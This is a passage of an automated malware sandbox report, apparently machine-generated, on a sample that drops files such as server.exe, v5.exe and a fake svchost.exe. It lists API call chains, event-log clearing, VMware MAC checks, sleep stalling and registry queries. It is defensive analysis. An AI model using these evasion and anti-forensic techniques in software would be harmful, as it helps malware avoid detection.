                Source: C:\Windows\Temp\ .exeCode function: 5_2_0043D078 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,5_2_0043D078
                Source: C:\Windows\Temp\ .exeCode function: 5_2_0043A8F0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,5_2_0043A8F0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1000A4D0 OpenEventLogA,ClearEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog,3_2_1000A4D0
                Source: C:\Windows\Temp\v5.exeCode function: 4_2_00407470 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,socket,inet_addr,sendto,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,CreateProcessA,TerminateProcess,Sleep,CreateProcessA,Sleep,TerminateProcess,Sleep,RtlExitUserThread,wsprintfA,Sleep,send,Sleep,RtlExitUserThread,Sleep,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,CreateProcessA,Sleep,TerminateProcess,wsprintfA,wsprintfA,wsprintfA,wsprintfA,send,send,Sleep,RtlExitUserThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,sendto,socket,sendto,Sleep,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,send,Sleep,send,Sleep,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,send,wsprintfA,wsprintfA,send,Sleep,RtlExitUserThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_00407470
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\v5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\v5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\033726\svchost.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Temp\ .exeCode function: 00-05-69 VMWARE, Inc. 00-0C-29 VMware, Inc. 5_2_00405DB0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100022F03_2_100022F0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100022F08_2_100022F0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10001800 in eax, dx3_2_10001800
                Source: C:\Windows\Temp\v5.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_4-1365
                Source: C:\Windows\Temp\server.exeStalling execution: Execution stalls by calling Sleepgraph_3-19499
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle,3_2_100018A0
                Source: C:\Windows\Temp\server.exeCode function: OpenSCManagerA,OutputDebugStringA,LocalAlloc,LocalAlloc,EnumServicesStatusA,LocalAlloc,lstrlen,LocalAlloc,OpenServiceA,LocalAlloc,QueryServiceConfigA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,3_2_10010760
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: OpenSCManagerA,OutputDebugStringA,LocalAlloc,LocalAlloc,EnumServicesStatusA,LocalAlloc,lstrlen,LocalAlloc,OpenServiceA,LocalAlloc,QueryServiceConfigA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,8_2_10010760
                Source: C:\Windows\Temp\v5.exeCode function: 6D0C6DE0,LoadLibraryA,6D0C6DE0,LoadLibraryA,6D0C6DE0,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegQueryValueExA,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount,2_2_00406090
                Source: C:\Windows\Temp\v5.exeCode function: GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount,4_2_00406090
                Source: C:\Windows\Temp\ .exeCode function: GetAdaptersInfo,GetAdaptersInfo,5_2_0042E9F0
                Source: C:\Windows\Temp\ .exeCode function: SetTimer,GetAdaptersInfo,5_2_0042F050
                Source: C:\Windows\Temp\server.exeThread delayed: delay time: 180000Jump to behavior
                Source: C:\Windows\Temp\server.exeThread delayed: delay time: 1200000Jump to behavior
                Source: C:\Windows\Temp\server.exeThread delayed: delay time: 180000Jump to behavior
                Source: C:\Windows\SysWOW64\033726\svchost.exeThread delayed: delay time: 180000
                Source: C:\Windows\SysWOW64\033726\svchost.exeThread delayed: delay time: 1200000
                Source: C:\Windows\SysWOW64\033726\svchost.exeThread delayed: delay time: 180000
                Source: C:\Windows\Temp\server.exeWindow / User API: threadDelayed 826Jump to behavior
                Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 504
                Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 514
                Source: C:\Windows\Temp\v5.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_2-1569
                Source: C:\Windows\Temp\server.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_3-19783
                Source: C:\Windows\SysWOW64\033726\svchost.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                Source: C:\Windows\Temp\v5.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-1891
                Source: C:\Windows\SysWOW64\033726\svchost.exeAPI coverage: 9.0 %
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100022F08_2_100022F0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100022F03_2_100022F0
                Source: C:\Windows\Temp\server.exe TID: 7476Thread sleep count: 826 > 30Jump to behavior
                Source: C:\Windows\Temp\server.exe TID: 7476Thread sleep time: -148680000s >= -30000sJump to behavior
                Source: C:\Windows\Temp\server.exe TID: 7592Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\Temp\server.exe TID: 7592Thread sleep time: -1200000s >= -30000sJump to behavior
                Source: C:\Windows\Temp\server.exe TID: 7592Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\Temp\server.exe TID: 7476Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Windows\Temp\v5.exe TID: 7756Thread sleep count: 116 > 30Jump to behavior
                Source: C:\Windows\Temp\v5.exe TID: 7756Thread sleep time: -2088000s >= -30000sJump to behavior
                Source: C:\Windows\Temp\v5.exe TID: 7772Thread sleep time: -72000s >= -30000sJump to behavior
                Source: C:\Windows\Temp\v5.exe TID: 7752Thread sleep count: 59 > 30Jump to behavior
                Source: C:\Windows\Temp\v5.exe TID: 7688Thread sleep time: -90000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7848Thread sleep count: 75 > 30
                Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7848Thread sleep time: -13500000s >= -30000s
                Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7868Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7860Thread sleep count: 253 > 30
                Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7868Thread sleep time: -1200000s >= -30000s
                Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7848Thread sleep time: -180000s >= -30000s
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041CJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001401Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003C01Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C01Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000801Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C01Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003401Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003001Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001001Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001801Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002001Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00004001Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000401Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002801Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C01Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003801Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002401Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000423Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000402Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C04Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001404Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000804Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001004Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000404Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041AJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000405Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000406Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000465Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000813Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000413Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C09Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002809Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001009Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002409Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001809Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002009Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001409Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003409Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C09Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C09Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000409Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003009Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000425Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000429Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040BJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000080CJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C0CJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040CJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000140CJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000180CJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000100CJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C07Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000407Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001407Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001007Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000807Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000408Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040DJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000439Jump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040EJump to behavior
                Source: C:\Windows\Temp\ .exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000421Jump to behavior
